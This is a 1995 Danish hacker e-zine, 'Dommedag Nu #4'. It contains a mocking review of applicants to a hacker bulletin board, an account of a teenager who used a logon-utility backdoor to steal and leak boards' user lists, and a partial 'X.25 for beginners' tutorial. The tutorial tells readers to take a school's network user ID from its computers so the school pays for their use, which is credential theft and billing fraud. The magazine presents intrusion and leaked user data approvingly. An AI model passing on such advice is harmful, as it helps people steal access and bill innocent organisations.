home *** CD-ROM | disk | FTP | other *** search
/ SuperHack / SuperHack CD.bin / Hack / MISC / DDN-4.ZIP / DDN4.TXT next >
Encoding:
Text File  |  1995-10-04  |  89.4 KB  |  2,105 lines

  1. 301603 Z SEP 1995
  2. STARTEX
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9.  
  10.  
  11.  
  12.                              Dommedag Nu #4
  13.                                - SMERSH -
  14.  
  15.  
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26. DUMMESLAG TIL Deja-vu.......
  27. Vores 3Lit3 SYSGUD på PLAN B har gjort det igen. Da han, som den f¢rste, fik
  28. lagt sine klamme hænder på en kopi af DDN#3 spredte han den som d¢d og helvede,
  29. hvilket er helt fint, det var faktisk meningen, men der er bare et lille pro-
  30. blem. Problemet består i hans BBS add, som i dette tilfælde hed BEERS.EXE.
  31. Problemet med BEERS.EXE var, at den var inficeret med QuickSilver virus'en, og
  32. den blev så spredt over det ganske land. Dette var godt nok ikke med vilje,
  33. men stadigvæk: DUMMESLAG TIL Deja-Vu..... [Dommen udf¢rt den 11/9 1995 -red].
  34.  
  35. Men nu til noget helt andet. Velkommen til Dommedag Nu #4. Jeg/vi håber, at i
  36. syntes om det, og spreder det som gale. Som sædvanligt vil vi gerne have noget
  37. "feedback" på magasinet, og vi kan kontaktes på PLAN B, eller på vores 3 Dist.
  38. sites (se nedenunder). Vi har lagt mærke til, at folk fors¢ger at komme i kon-
  39. takt med os de mærkeligeste steder. Vi ringer ikke meget rundt, så her kan du
  40. få fat på f¢lgende:
  41. Saron - Rundt omkring, men ringer med meget forskellige intervaller.
  42. Clive Sharp - Hænger ud på PLAN B, Darkside Connection og ingen andre steder!!!
  43. Deja-Vu - Rundt omkring, også på de fleste st¢rre WaR3z boards...
  44. Narkobagmanden & 99papa er phreakere (og 3LiTe trashere (hmmm)) som ikke ringer
  45. rundt, men de kan, hvis i vil snakke med dem, kontaktes gennem Saron, Clive
  46. Sharp & Deja-Vu.
  47.  
  48. Vi mangler, som sædvanligt, noget materiale som vi kan smide i bladet, så hvis
  49. du har noget du mener der er interesseant, smid det op til os. ALT har inter-
  50. esse, men vi kan ikke garantere at det kommer med i bladet. Jo mere teknisk
  51. det er, jo bedre, men det er bestemt ikke noget krav, så hvis du har en capture
  52. fra dit sidste hack, eller noget andet i den genre, upload det til os (men s¢rg
  53. for at det ikke er FOR "belastende").
  54.  
  55. Nok fra mig, mu skal du bare nyde bladet....
  56. - Clive Sharp
  57.  
  58.  
  59.  
  60. Medvirkende:
  61.  
  62. De 7 på toppen:         Redakt¢r............... Pat Bateman
  63.                         Eksklusiv skribent..... Saron
  64.                         KTAS hævneren.......... Clive Sharp
  65.                         Lærlingen.............. Narkobagmanden
  66.                         Helten................. 99papa
  67.                         Den onde............... Darkseed
  68. Logistik:               SYSGUD................. Deja-vu
  69.                         PLAN B................. 31220506
  70.  
  71. UAFD:                   Darkside Connection.... 45974344
  72.                         Alien Staircase........ 31575188
  73.                         Restricted Access...... 36703060
  74.  
  75. Og det l¢se:            Tak til................  Darkman , TorNado & Solaris
  76.                         Farve af............... QEdit Advanced V3.00c SW
  77.                         Tryk af................ Cannon LBP-4
  78.                         Lagerplads............. Western Digital
  79.                         Outside Broadcasting... Zitech 486/66 bærbar Motorola
  80.                         Lyd.................... GravisUltraSound MAX
  81.                         Musik.................. Frontline Assembly
  82.                         Vi anbefaler........... BOMBJACK
  83.  
  84. Indholdsfortegnelse:
  85.  
  86. 1.      Livet på PLAN-B.
  87. 2.      Saga'en om Junker Jake.
  88. 3.      X.25 for begyndere.
  89. 4.      AT&T - En global organisation.
  90. 5.      En Polymorphic Virus.
  91. 6.      Hvad vil fremtiden bringe for Dommedag Nu?
  92. 7.      CyberBug v. 1.00
  93.  
  94. Nyheder (taget, stort set, fra den Danske dagspresse).
  95.         Hackere Bustet!
  96.         Hackere anholdt. [Fra Ekstra-Bladet (suk!).]
  97.         Råd til Danske sysopper og brugerne af deres systemer.
  98.         Dansk Piratlinie oprettet. [Jyllands-Posten.]
  99.         Svære tider for hackere. [ComputerWorld.]
  100.         Hackere ringer verden rundt på andres Visa Dankort. [ComputerWorld.]
  101.         Se hackerens telefonnummer. [ComputerWorld.]
  102.         Sikkerhedshul i Netscape. [ComputerWorld].
  103.  
  104.  
  105.  
  106.  
  107.  
  108.                 ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
  109.  
  110.  
  111.  
  112.  
  113.  
  114.                 Livet på PLAN-B (Uden synd ingen frelse)
  115.                         Af Clive Sharp & Deja-vu
  116.  
  117.  
  118. 1.      Indledning
  119.         Efter vi bragte nummeret til PLAN-B i Dommedag Nu nr. 3, har vi fået en
  120. masse henvendelser. Mange af dem er fra folk der ved hvad de snakker om, men
  121. desværre er der også en masse folk, som INTET ved om hacking. Dette er jo ikke
  122. nogen synd, da vi alle skal starte fra et sted. Problemet er, at der er FOR
  123. mange, der slet ikke har noget grundlag for at begynde at hacke. Det mest ide-
  124. elle ville være, at vi lod alle komme ind på boardet, men det ville give os
  125. (især Deja-Vu) en uoverskuelig arbejdsopgave. Så for at skille de vidende fra
  126. de "uvidende" har vi installeret nogle "sp¢rgeskemaer" når man s¢ger om optag-
  127. else som ny bruger.
  128.         Disse "sp¢rgeskemaer" har været grundlag for mange timers sjov, og nu
  129. vil vi dele disse sjove oplevelser med alle jer. Bemærk venligst, at alle disse
  130. svar er givet i FULDT ALVOR, hvilket g¢r det ret sjovt. Alle navne er blevet
  131. slettet, da vi ikke ¢nsker at hænge nogen ud. Alt i [] er vores kommentarer. Nå,
  132. men lad os komme i gang.
  133.  
  134.  
  135. 2.      PLAN B registering - Hacking
  136.  
  137.         Hvor ligger de priviligerede porte på TCP/IP:
  138.         ■       Til venstre!?! [HVAD?!? Har du r¢get???]
  139.  
  140.         Hvad er Telnet port 25 og 79:
  141.         ■       X.25 og X.79 [Næppe.]
  142.         ■       Tele port 25 of 79. [Hvad ????]
  143.  
  144.         Hvad er X.25:
  145.         ■       Telenet standart. [Nope.]
  146.         ■       Netwærk. [Tæt på, men ikke helt korrekt....]
  147.         ■       NUA connection (datapak). [hmmmmm...]
  148.  
  149.         Hvad er .RHOSTS:
  150.         ■       Telenet standart. [Nej......]
  151.  
  152.         Hvad er en PAD:
  153.         ■       Et tastatur. [Man tror det er l¢gn.]
  154.         ■       Password active destroyer. [Hvad er det?????]
  155.  
  156.         Hvad er COPS:
  157.         ■       Fedz. [Hvor dum kan man være...]
  158.         ■       Bad ones. [Ditto.]
  159.         ■       Politi betjent. [Ditto.]
  160.         ■       Politi??? [Ditto.]
  161.         ■       Politi. [Ditto.]
  162.         ■       En sysop. [Ok, måske er der en sysop der hedder COPS, men tror
  163.                 du det er ham der bliver spurgt efter???]
  164.         ■       Et program på TV VestKysten [!!!!!]
  165.  
  166.         Hvad er SATAN:
  167.         ■       Div evil. [?!?!?!?]
  168.  
  169.         Hvad er ideen bag en FIREWALL:
  170.         ■       To protect system. [Det skal nok uddybes lidt..]
  171.         ■       Man kan komme ind igen. [Så starter vi forfra igen.]
  172.         ■       At beskytte sig. [Godt gættet.]
  173.  
  174.         Hvad er en NUI:
  175.         [Dette svarer de fleste rigtigt på.]
  176.  
  177.         Hvad er RSH:
  178.         [Dette svare de færreste på.]
  179.  
  180.         Hvad er Crackerjack:
  181.         ■       Et program. [Fedt....]
  182.         ■       Hacker program. [Uddybes tak....]
  183.         ■       Online password cracker. [Ikke helt....]
  184.  
  185.         Hvad er CERT:
  186.         ■       Hacker group. [Super lamerzz....]
  187.         ■       En hacker gruppe. [Ditto.]
  188.         ■       Hacker gruppe. [Ditto]
  189.  
  190.         Hvem er CERT's Danske medlem:
  191.         [Kun 1 har svaret på dette.]
  192.  
  193.         Hvad er/var QSD:
  194.         ■       D¢dt. [hmmmmm.]
  195.         ■       Et board. [Ikke helt rigtigt.]
  196.  
  197.         Hvordan bruge man ICMP beskeder til egen fordel:
  198.         ■       Well, send and recieve. [Hvad?!?!?]
  199.         ■       Læse dem. [Hvad ?!?!?!?]
  200.  
  201.         Hvordan virker en ETHERNET SNIFFER:
  202.         ■       Cops. [!?!?!?!]
  203.         ■       Samler password. [Og hvad mere.....]
  204.  
  205.         Hvad er nemt hvis TFTP er sat dårligt op:
  206.         ■       Hack. [Godt tænkt..., men måske lidt mere præcist.]
  207.         ■       At hacke sig ind. [Ditto.]
  208.         ■       Hacke sig ind. [Ditto.]
  209.         ■       At hacke shit'et. [Ditto.]
  210.         ■       Hente filer der ikke er tilgængelige. [Ditto.]
  211.  
  212.         Hvad er en GOD/OD:
  213.         ■       Ahmm Think it is a Sysop. [Det er næppe det der bliver tænkt
  214.                 på i et hacking "sp¢rgeskema", vel???].
  215.         ■       Sysop. [Ditto].
  216.  
  217.  
  218. 3.      PLAN B registrering - Phreaking
  219.  
  220.         Hvilke Numrer BlueBoxer man altid over:
  221.         [Ganske få svarer på dette.]
  222.  
  223.         Hvad er teorien bag BlueBoxing:
  224.         ■       At ringe gratis. [Måske lidt mere specifikt.]
  225.         ■       At skabe frit lejde gennem nettet. [Frit lejde???]
  226.         ■       At udsende en tone der forvirer systemet. [Nej..]
  227.         ■       No pay (for da phreaker). [Godt tænkt..]
  228.         ■       Hmm bb er det ikke det med lyd Hz. [Det er det nemlig..]
  229.         ■       Ja man bruger en frekvens til at snyde tlf. [Nej nu bliver det
  230.                 for teknisk...]
  231.         ■       erhm PBX??? [Båtnakke].
  232.  
  233.         Hvad er CCCIT 5:
  234.         ■       Nogle seje gutter. [Tror han, at det er en gruppe?????]
  235.         ■       Calling card. [Nej....]
  236.         ■       Modem standart. [Hmmm, nope..]
  237.  
  238.         Hvad er en PBX:
  239.         ■       Dialout site. [Hmmm.]
  240.         ■       Power box. [Hvad er det???]
  241.         ■       Et sted som du ringer videre fra. [uhhh....]
  242.  
  243.         Hvad er "Alliance conf.":
  244.         ■       Phreaking. [Ikke just.]
  245.         ■       A friendly one. [Hvad?!?!?!]
  246.  
  247.  
  248. 4.      PLAN B registrering - Virus
  249.  
  250.         Hvad er VCL:
  251.         ■       Virus Clean. [Næppe.]
  252.         ■       Program. [Godt gættet.]
  253.         ■       Virtuelt Clear Lockout. [Hvad?!?!?!]
  254.  
  255.         Hvor'n virker en Polymorphic virus:
  256.         ■       ¥delæggende. [NNEEEJJJJ.]
  257.         ■       Formaterer din HD. [Ditto.]
  258.  
  259.         Hvem er Dark Avenger:
  260.         ■        Frygtet. [Fedt...]
  261.         ■        Hvis med i PWA... [Super Lamer!!]
  262.         ■        Virus program. [Nej, nej, nej.]
  263.         ■        En skummel fyr. [Fedt, og hvad mere???]
  264.         ■        En Virus. [Nej.]
  265.  
  266.         Hvad er 40HEX:
  267.         ■       Ahmm.. Hex er hexa decimaler. [Det er næppe det der bliver
  268.                 spurgt om i et Virus area, vel??]
  269.         ■       Langues. [?!?!?!?]
  270.         ■       Program-tal. [Fedt!!]
  271.         ■       Som related stuff.. [Godt gættet.]
  272.         ■       En virus. [Nej.]
  273.         ■       The magic number of kilobytes a com file kan be. [Det er næppe
  274.                 det der bliver spurgt efter.]
  275.  
  276.  
  277. 5.      "Brevet"
  278.         Man skal nu ikke tro, at "sp¢rgeskemaerne" er det eneste vi bruger til
  279. at vurderer en ny bruger, for det er det ikke. Vi har brugere, der ikke har
  280. svaret på et eneste sp¢rgsmål, og grunden hertil er, at hvis man har den rette
  281. indstilling, så kan man sagtens komme ind, selvom at man ikke har den helt
  282. store viden om hacking. Herefter f¢lger nogle af de breve vi har modtaget, fra
  283. nye brugere. Fælles for alle disse breve er:
  284.         1.      Ingen af dem havde udfyldt et rimeligt antal sp¢rgsmål (eller
  285.                 bare et!), og
  286.         2.      ganske få kom ind på boardet (i så tilfælde er de medtaget her,
  287.                 pga. deres mere eller mindre morsomme breve).
  288.  
  289.  
  290. 6.      Hvad De skrev
  291.  
  292.         ■       Well I'll leave this shit up to you.
  293.  
  294.         ■       jeg håber at vi kan udveksle mange gode crack's og warez
  295.                 programmer. jeg har bland andete qmodem pro 2.0 for win95,
  296.                 norton navigator for win95, windowscommander v1.61 *cracked*
  297.                 m.m. please upgrade me!
  298.                 [Er du sikker på, at du har ringet det rigtige sted hen???
  299.                 Det er vi IKKE!]
  300.  
  301.         ■       you need me!!!!
  302.  
  303.         ■       Ahm... Jeg er Faktsik Kun Elite... Ikke rigtig noget inden for
  304.                 Virus eller hacking eller Phreak... SO...
  305.                 Håber jeg kommer ind... [3LiTe den her!!!]
  306.  
  307.         ■       Ahm... I HATE VIUS :)   [I hate jou :) ]
  308.                 Na... Jeg er kun en lille pirat Hacker ikke phreaker...
  309.                 OG coder heller ikke virussersss
  310.                 SEEEEES [yeps.. netop]
  311.  
  312.         ■       HVORFOR??????????????????????
  313.                 Hvorfor er jeg ikke kommet ind igen???????
  314.                 Jeg var på DL-top10'en!!!!!!!! [!!!]
  315.                 Jeg skrev meget!!!!!!!!!!!!!!! [Kvalitet frem for kvantitet!]
  316.                 Hvad nu??? Hvad vil du ha'???????
  317.                 PLEASE LET ME IN!!!!!!!!!!!!!!!!
  318.  
  319.         ■       Hi..   Tjjaa.. jeg jan sikkert svarre på nogle af de sp¢rsmål.
  320.                 men det er ville sikkert ikke være rigtigt alligevel...
  321.                 Det eneste jeg er interseret i er at Trade og Warez... så jeg
  322.                 tænkte at dette BBS ville være som skabt for mig for at få nye
  323.                 MCI med mere..
  324.                 Cya Later... [Vi HaR De$\/æRr3 ikk3 MCi'$ pÅ B0aRd3t]
  325.  
  326.         ■       jeg ¢nsker bare access til hacking program
  327.                 [Maj mange hacking program har, dig ingen adgang!!]
  328.  
  329.         ■       SOM DU KAN SE ER JEG NEW USER OG OENSKER AXX PAA BOARDET.
  330.                 DA DU HAR LAEST MIN REGISTRERING KAN DU SE AT JEG IKKE VED
  331.                 MEGET OM H/P/A
  332.                 I DET HELE TAGET MEN DET ER NETOP OGSAA GRUNDEN TIL AT JEG
  333.                 OENSKER AXX, FOR AT LAERE OM DET SAA JEG KAN BLIVE BEDRE.
  334.                 DERFOR HAABER JEG AT DU VIL GRANETE AXX TIL MIG. [Slå lamer
  335.                 tasten fra!]
  336.  
  337.         ■       Well, I stink can't help it, det er anden gang jeg har fyldt
  338.                 ud, saa denne bliver vel ligesaa daarlig som den foerste -
  339.                 aergeligt.. Well, Glad to stop by anyway.
  340.                 [Tredie gang er lykkens gang!]
  341.  
  342.         ■       Hej Med dig.
  343.                 Hvad fanden er det for nogle åndsvage sp¢rgsmål?
  344.                 Jeg troede jeg havde fundet en varm hacker bbs
  345.                 og så havner jeg i lykkehjulet
  346.                 har jeg vundet noget?
  347.  
  348.         ■       hi deja-vu im sure i've seen you before he he
  349.                 im not no elite and im sure not an enclypidia im afraid i could
  350.                 not answer any of your ? maybe the 40hex if i calculatet i little
  351.                 bit but i dont think that it would matter much anyway im sure
  352.                 XXXXXXXX [Slettet -red] will say ok for me im uuping and
  353.                 downing some warez sometimes well thats about it i guess.
  354.                 [Når man pr¢ver at omregne 40h til decimal (og så på det eneste
  355.                 sp¢rgsmål man besvarer), og ikke engang kan det, SÅ ER MAN
  356.                 PRESSET I BUND!!]
  357.  
  358.         ■       Hi there..
  359.                 Kunne jeg komme ind her... or.. ?
  360.  
  361.         ■       hejsa jeg håber at jeg får access, da jeg er MEGET interassede
  362.                 i at få nogle nye spil & progs.....
  363.                 [Nej men du kan ringe til DanBBS og sp¢rg om du ikke kan blive
  364.                 opgraderet til Elite Pirat Bruger!]
  365.  
  366.         ■       Give me access_! [Sut mig!]
  367.  
  368.  
  369. 7.      Et sidste ord
  370.         Nogle vil måske syntes, at vi er temmeligt arrogante, og at vi ikke kan
  371. tillade os, at hænge folk på denne måde. Til det vil svaret være: Når man har
  372. ca. 1-2 nye brugere om dagen, så bliver man temmeligt træt af, at se på folk
  373. som ikke kan/gider at udfylde vores "sp¢rgeskemaer", og når der nu engang imel-
  374. lem kommer en rigtig WaR3z gut forbi, så må man sku' da kunne lave lidt sjovt
  375. med dem, det er jo ikke kun fuldt alvor.
  376.         Under alle omstændigheder, så håber vi, at denne artikel har været lige
  377. så sjov at læse, som den var at lave.
  378.  
  379.  
  380.  
  381.  
  382.  
  383.                 ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
  384.  
  385.  
  386.  
  387.  
  388.  
  389.                          Saga'en Om Junker Jake
  390.                         ------------------------
  391.                                - Darkseed
  392.  
  393. Alt er blevet sagt, og alt bliver sagt, men hvad var grunden til at en dreng på
  394. 14 år kom ind, og hvad kom og kommer det til at betyde.
  395.  
  396. En lille ubetydelig "jeg er intet" fyr, havde tilfældigvis på ukendt måde,
  397. fundet ud af, at der var en backdoor i Vigilantes S-Logon Utility til PCboard
  398. der gav mere eller mindre access til at kunne fx. hente et boards Userliste,
  399. så han gav sig UDEN at tænke, igang med 2 boards (Dyers Eve samt Travelogue)
  400. som han så fik deres Userlister ud af, lidt tid gik så, hvor Junker Jake så
  401. misbrugte nogle forskellige accounts, downloadede osv.
  402.  
  403. Nu gik det f¢rst galt, Junker Jake releasede nu de 2 Userlister over mange
  404. Elite boards, der derefter fik trædem¢llen til at træde rundt, medf¢lgene i
  405. arkivet var f¢lgene tekst fra Junker Jake.:
  406.  
  407.      Yo!, Her er en besked til alle i denne skide lamme "scene" kaldet dk :
  408.  
  409.      %\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\
  410.       Efter at have blevet taget i farten med at have det sjovt, har jeg
  411.       besluttet mig at stoppe i scenen nu. Den rigtige historie er nok at
  412.       jeg hackede nogle Boards, folk blev sure, selv om jeg ikke gjorde
  413.       nogen skade. Udover at misbruge deres accounts for at downloade.
  414.        Så det var det, jeg stopper! Det var meget sjovt og jeg putter det
  415.         hele bag mig nu, og får et liv uden Teledanmarks telefonregning.
  416.         Jeg vil bare sige tak til alle de mennesker jeg har chattet mig,
  417.         tradet osv. Og jeg er specielt ked af at misbruge Bionics account,
  418.        men det var meget sjovt på Velvet Underground :) tja jeg er ked af
  419.       det, men det er jo hvad der sker. Men ok alt hvad jeg fik ud af det
  420.          var nogle chips, lidt Cola, nogle Userlists osv. Jeg er totalt
  421.         ligeglad, med de Userlists, så her er de :) jeg råder alle der er
  422.         listet i disse Lister, at ændre deres Passwords, Tlf.nummere osv.
  423.      %\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\
  424.  
  425.                       Ses, Junker Jake / =[>ALPHA FLiGHT<]=
  426.  
  427. En ting som Junker Jake skrive, som jeg bed mærke i f¢rst, var sætningen
  428.  
  429. > Men det er jo hvad der sker.
  430.  
  431. Jeg vil efter sk¢n sige at dette ikke er hvad der sker, da selve "scenen"
  432. ikke er interesseret i at skade sig selv. Det har hidtid ikke været et
  433. problem, men en stadig stigene mængde af "unge" folk ses stadig at komme
  434. ind i scenen - Disse mennesker eller b¢rn, har ingen efaring, og kender ikke
  435. de (U)-skrevne love i scenen, ganske simpelt fordi de ikke har været længe
  436. nok i scenen til at kunne lære det - Men stadig er det ingen undskyldning,
  437. overhovedet ikke, for de burde ikke være her, medmindre de er helt indforstået
  438. med hvad den såkaldte "scene" er for noget...... Men tilbage til emnet.
  439.  
  440. Efter filerne var blevet spredet godt rundt, begynder det f¢rst at se sort ud
  441. for Junker Jake, alle flamede ham (og g¢r det stadig), nogle folk har været
  442. ude på hans private adresse for at lære ham ordet "VOLD", dette mislykkes da
  443. han ikke var hjemme, men en seddel var blevet lagt til ham, og Junker Jake
  444. skyndte sig så at ringe til en af dem, hvorefter han fik en telefon-svarer,
  445. det sagde Junker Jake så at han havde h¢rt at nogle havde været ude hos ham
  446. for at banke ham, og han var ked af det, samt at han havde smidt Userlisterne
  447. væk igen.. [Denne sampel ligger også i Zip filen, samt en player -red].
  448.  
  449. Dette hjalp dog ikke, en anden person ringede til Junker Jake for at tale med
  450. ham, hvorefter han br¢d sammen og græd - efter ca. 1000 tårer tilb¢d han så
  451. at betale for en ny oprettelse af en linie, samt nogle andre ting.
  452.  
  453. -----
  454.  
  455. Indtil dette har det været temmelig umuligt, for PHG (Politiets Hacker Gruppe)
  456. at ramme scenen, men efter Pharzyde Bust, begynder de sorte tider at kikke
  457. frem, politiet har, som skrevet i en anden artikel, alle stederne hvor
  458. Pharzyde har ringet hen - Og af en af mine pålidlige kilder har jeg fået at
  459. vide at "Travelogue" allerede er lukket.
  460.  
  461. Jeg vil ligeså råde folk der er i "scenen" at de passer lidt på med hvad de
  462. g¢r i det næste stykke tid, da "scenen" ikke er så sikker som den har været.
  463. Vi skal selvf¢lgelig huske at takke Junker Jake for at der nok kommer mange
  464. Busts i denne tid....
  465.  
  466.  
  467.  
  468.  
  469.  
  470.                 ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
  471.  
  472.  
  473.  
  474.  
  475.  
  476.                            X.25 for begyndere
  477.                              Af Clive Sharp
  478.  
  479.  
  480. 1.      Hvad er X.25
  481.         X.25 er i Danmark også kendt som Datapak, og er en internationalt
  482. netværk, som var et af de st¢rste netværk inden Internettet blev trendy. Det er
  483. forbundet med mange andre mere eller mindre bizarre netværk i rigtigt mange
  484. lande, og som eksempler kan nævnes SprintNet, TymNet o.s.v. Der findes GateWays
  485. på X.25, dvs. at man kan f.eks. komme på Internettet ved at k¢re gennem X.25.
  486. Man kan selvf¢lgeligt også bare hacke en maskine på X.25, der har forbindelse
  487. til Internettet, og så k¢re gennem der. Men den bedste ting ved X.25 er:
  488. DET ER GRATIS AT RINGE TIL!!!!!
  489.  
  490.  
  491. 2.      Historien bag X.25 (MEGET KORT)
  492.         Den teknologi der bruges på X.25 idag stammer, i bund og grund, fra
  493. 1968, hvor ARPANET kom op at k¢re. Ideén bag X.25 er Packet Switching, som er
  494. bygget op på denne måde (MEGET forenklet):
  495.  
  496.         ■  Al data bliver sendt i pakker, som er opbygget på denne måde:
  497.                 ■       Pakken har én bestemt længde.
  498.                 ■       Pakken har adressen på modtageren (logisk nok).
  499.                 ■       Pakken har et nummer, så man kan bestemme rækkef¢lgen
  500.                         hos modtageren (de ville nok ikke være så smart, hvis
  501.                         pakkerne kom på denne måde: 1,3,2,4,6,9,111,10 o.s.v,
  502.                         det er selvf¢lgeligt et krav, at pakkerne kommer som:
  503.                         1,2,3,4,5,6,7,8,9,10 o.s.v.).
  504.  
  505.         Stedet hvor al data'en bliver delt op i pakker (og sat sammen i pakker)
  506. er en PAD. PAD betyder Packet Assembler/Disassembler, og det er den man logger
  507. ind på i vores tilfælde.
  508.  
  509.  
  510. 3.      Hvordan logger man på
  511.         For at logge på skal du g¢re f¢lgende:
  512.  
  513.         ■       Ring 171 (Det er gratis!!)
  514.         ■       Når du har fået en connect, så sker der ikke noget...
  515.                 Du skal nu trykke : go (uden return).
  516.         ■       På skærmen står der nu:
  517.                 DATAPAK X.28 SERVICE
  518.                 PAD-ID : HIPC_
  519.                 PORT-NO : 28
  520.                 ENTER NUI ->
  521.  
  522.         Her begynder det at blive spændende. De f¢rste 3 linier har ikke den
  523. store interesse i vores tilfælde (grunden til at der står X.28 er, at X.28 er
  524. den protokol som bruges mellem terminalen og PAD'en, mens X.25 er den protokol
  525. som bruges til kommunikation "internt" på nettet) men den sidste linie er
  526. enormt interesseant. Da jeg sagde, at det var gratis at bruge X.25 l¢j jeg
  527. lidt. Det er gratis at ringe op, men så skal man opgive et nummer, hvor ens
  528. forbrug skal krediteres. Dvs. at den person/firma hvis nummer man bruger får
  529. regningen (temmeligt fikst, ikke sandt ?!). Et sådanne nummer hedder en NUI,
  530. Network User Id, og er opbygget på denne måde:
  531.  
  532.         ■       XYYYYYYYZZZZZZZZ
  533.                 X= Et bogstav, bestemt af TeleDanmark.
  534.                 Y= Nogle tal, bestemt af TeleDanmark.
  535.                 Z= Tal eller bogstaver, bestemt af kunden.
  536.  
  537.         Hvis du så har indtastet en gyldig NUI i linie 4 (se ovenover), frem-
  538. kommer en [*], og så er du parat til at gå amok på nettet.
  539.         Men lad nu være med at sidde og pr¢ve at "gætte" en NUI, for det VIL
  540. blive opdaget af TeleDanmark. Istedet så check din skoles computer (forudsat at
  541. du går i skole), for der er temmelig stor sandsynlighed for, at skolen har
  542. Datapak adgang, og så kan du jo bare lade skolen betale dine "udflugter" :).
  543.  
  544.  
  545. 4.      Simple funktioner
  546.         Men f¢r du kan begynde dit super-vilde-hacker-gå-amok-trip på nettet,
  547. så skal du lige vide lidt mere om hvordan det virker. Det f¢rste du skal vide
  548. noget om, er en(et??) NUA. NUA betyder Network User Address, og er bygget op på
  549. denne måde:
  550.  
  551.         ■       023421920100401
  552.                 ││  ││   ││   │
  553.                 │└┬─┘└─┬─┘└─┬─┘
  554.                 │ │    │    │
  555.                 │ │    │    └────────── Netværk adresse (variabel længde, men
  556.                 │ │    │                standarten er 5 eller 3).
  557.                 │ │    └─────────────── Område præfix (længden ligger, såvidt
  558.                 │ │                     jeg ved, fast på 5).
  559.                 │ └──────────────────── DNIC (Data Network Identification Code)
  560.                 │                       Længden ligger fast på 4. DNIC bruges
  561.                 │                       til at identificere hvilket netwærk man
  562.                 │                       er på, og hvilket land det ligger i.
  563.                 │                       Se punkt 6.
  564.                 └────────────────────── 0 bruges hvis man ringer til en NUA der
  565.                                         ligger i samme land, som den PAD man
  566.                                         bruger, hvis man ringer udenlands, skal
  567.                                         man bruge 9 istedet.
  568.  
  569.         Der findes en masse dejlige funktioner på Datapak, men her vil jeg nu
  570. kun gennemgå en, nemlig CON. CON bruges til at få forbindelse til en anden com-
  571. puter på nettet (CONnect). Dvs. at hvis jeg vil i forbindelse med en computer
  572. med NUA'en 23421920100401, så skal jeg skrive:
  573.  
  574.         ■       *con 923421920100401
  575.                 ││ │ ││            │
  576.                 │└┬┘ │└─────┬──────┘
  577.                 │ │  │      │
  578.                 │ │  │      └────────── Vores NUA.
  579.                 │ │  └───────────────── 9 fordi vi ringer udenlands.
  580.                 │ └──────────────────── Vores CONnect kommando.
  581.                 └────────────────────── Datapac er parat.
  582.  
  583.         Så vil Datapac svare med at gentage linien (uden *), og efter et par
  584. sekunder skulle man kunne se: Login (eller hvad man nu har fået fat i).
  585.         Det skal dog lige nævnes, at man ikke beh¢ver at skrive con, da dette
  586. vil udf¢re præcis samme job: *923421920100401.
  587.         Overstående NUA er forresten noget der hedder CAMPUS 2000, og det er et
  588. slags chat system for skoler o.s.v. Personligt syntes jeg, at det er noget
  589. ækelt skod, men sådan er der så meget....
  590.  
  591.  
  592. 5.      Menu'en
  593.         Men Datapak har også en menu, som man kan lege rundt med. For at komme
  594. "ind" i menuen skal man bare skrive (når "*" er der): menu. Så kommer man ind i
  595. PAXNET PUBLIC PAD COMMAND MENU. Jeg vil ikke gennemgå menuen, da den er temme-
  596. ligt selvforklarende, dog skal der lyde en lille advarsel fra mig: Pas på med
  597. at rode ved ting du ikke kender noget til! Der er muligheder nok til at du kan
  598. brænde dine fingre, med det resultat, at din NUI lider en brat d¢d....
  599.  
  600.         Men hvis du absolut vil rode med den slags ting, så pr¢v at tast "?"
  601. (når "*" er der), så får du nogle settings du kan lege med. Personligt kan jeg
  602. ikke bruge dem til noget, men måske kan du.
  603.  
  604.  
  605. 6.      Hvilket land/netwærk er det?
  606.         F¢lgende liste er stjålet fra The Dark Council's tekst om DataPAC
  607. (brugt i: The Canadian Hacker's Bibel). Listen er rimeligt gammel (omkring
  608. 1990) så den er IKKE komplet, men jeg har ikke set nogle nyere update's, så det
  609. er hvad i får.
  610.  
  611.         ■       Land            Netværk's Navn  DNIC
  612.                 ────────────────────────────────────
  613.                 Andora          ANDORPAC        2945
  614.                 Antigua         AGANET          3443
  615.                 Argentina       ARPAC           7220
  616.                                 ARPAC           7222
  617.                 ¥strig          DATEX-P         2322
  618.                                 DATEX-P TTX     2323
  619.                                 RA              2329
  620.                 Australien      AUSTPAC         5052
  621.                                 OTC DATA ACCESS 5053
  622.                                 AUSTPAC         5054
  623.                 Bahamas         BATELCO         3640
  624.                 Bahrain         BAHNET          4263
  625.                 Barbados        IDAS            3423
  626.                 Belgien         DCS             2062
  627.                                 DCS             2068
  628.                                 DCS             2069
  629.                 Bermuda         BERMUDANET      3503
  630.                 Brasilien       INTERDATA       7240
  631.                                 RENPAC          7241
  632.                                 RENPAC          7248
  633.                                 RENPAC          7249
  634.                 Cameroon        CAMPAC          6242
  635.                 Cayman ¢erne    IDAS            3463
  636.                 Chad            CHAD            6222
  637.                 Chile           ENTEL           7302
  638.                                 CHILE-PAC       7303
  639.                                 VTRNET          7305
  640.                                 ENTEL           7300
  641.                 Kina            PTELCOM         4600
  642.                 Colombia        COLDAPAQ        7322
  643.                 Costa Rica      RACSAPAC        7120
  644.                                 RACSAPAC        7122
  645.                                 RACSAPAC        7128
  646.                                 RACSAPAC        7129
  647.                 Cypern          CYTAPAC         2802
  648.                                 CYTAPAC         2807
  649.                                 CYTAPAC         2808
  650.                                 CYTAPAC         2809
  651.                 Danmark         DATAPAK         2382
  652.                                 DATAPAK         2383
  653.                 Djibouti        STIPAC          6382
  654.                 Dom. rep.       UDTS-I          3701
  655.                 Egypten         ARENTO          6020
  656.                 Finland         DATAPAK         2441
  657.                                 DATAPAK         2442
  658.                                 DIGIPAK         2443
  659.                 Frankrig        TRANSPAC        2080
  660.                                 NTI             2081
  661.                                 TRANSPAC        2089
  662.                                 TRANSPAC        9330
  663.                                 TRANSPAC        9331
  664.                                 TRANSPAC        9332
  665.                                 TRANSPAC        9333
  666.                                 TRANSPAC        9334
  667.                                 TRANSPAC        9335
